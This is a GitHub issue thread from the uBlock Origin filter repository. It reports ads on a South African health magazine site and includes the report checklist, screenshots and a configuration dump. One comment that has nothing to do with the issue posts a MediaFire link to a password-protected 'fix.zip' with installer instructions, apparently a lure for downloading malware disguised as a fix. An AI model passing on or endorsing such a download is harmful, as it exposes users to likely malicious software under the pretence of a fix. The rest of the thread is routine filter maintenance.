### ISSUE TITLE
health.sistamagazine.co.za: ads

### ISSUE THREAD

**Issue by thugWV** [uBlockOrigin/uAssets#25048]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://health.sistamagazine.co.za/`

### Category

ads

### Description

![image](https://github.com/user-attachments/assets/90dea495-5348-4464-b725-7b1253916272)

### Other extensions used

Didn't use other extension

### Screenshot(s)

![image](https://github.com/user-attachments/assets/a1c26cb5-3e7f-48c8-bbb6-bf4f3a24e49a)

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium: 128
filterset (summary):
 network: 154002
 cosmetic: 47954
 scriptlet: 22151
 html: 0
listset (total-discarded, last-updated):
 default:
  user-filters: 0-0, never
  ublock-filters: 39598-223, 13m Δ
  ublock-badware: 10668-6, 13m Δ
  ublock-privacy: 1072-2, 15m Δ
  ublock-unbreak: 2497-0, 15m Δ
  ublock-quick-fixes: 188-0, 15m
  easylist: 85538-457, 13m Δ
  easyprivacy: 53073-821, 15m Δ
  urlhaus-1: 29590-0, 1m
  plowe-0: 3545-0, 1m
filterset (user): [empty]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 1949 ms
 maxAssetCacheWait: 575 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 6
 network:
  demand.supply: 2
  doubleclick.net: 1
  googlesyndication.com: 2
  googletagmanager.com: 1
 extended:
  ##.demand-supply
  ##[id^="div-gpt-ad"]:not([style^="width: 1px; height: 1px; posit…
  ##div[id^="div-gpt-"]:not([style^="width: 1px; height: 1px; posi…
  ##a[id][href="https://toolkitspro.com"][rel^="noopener noreferre…
  #@#[id^="div-gpt-ad"]
  #@#div[id^="div-gpt-"]
  #@#[data-ad-module]
  #@#[data-ad-width]
  #@#[data-adblockkey]
  #@#[data-advadstrackid]
  #@#[data-ad-manager-id]
```
</details>

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by stephenhawk8054** [comment]
It's from a shortener link. Give original URL.

**Comment by mapx-** [comment]
@thugWV 
ask here for help:
https://github.com/uBlockOrigin/uAssets/discussions/17361

**providing the original link**
